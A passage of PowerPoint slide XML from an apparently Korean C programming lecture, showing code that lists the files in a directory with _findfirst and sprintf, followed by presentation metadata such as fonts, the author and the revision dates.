            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILE_SEARCH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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ko-KR" altLang="en-US" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일찾는구조체</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search_Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "%s/*.*", path);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ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>경로출력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfirst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search_Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)) == -1L) {  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfirst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>지정해준 디렉토리 속 모든 파일 리스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>io.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("No files in current directory!\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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7281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2551</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>341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휴먼모음T</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Yu Mincho</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>함초롬돋움</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Bradley Hand ITC</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Lucida Handwriting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김다은</cp:lastModifiedBy>
  <cp:revision>88</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-03T14:15:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-03T07:31:03Z</dcterms:modified>
</cp:coreProperties>
</file>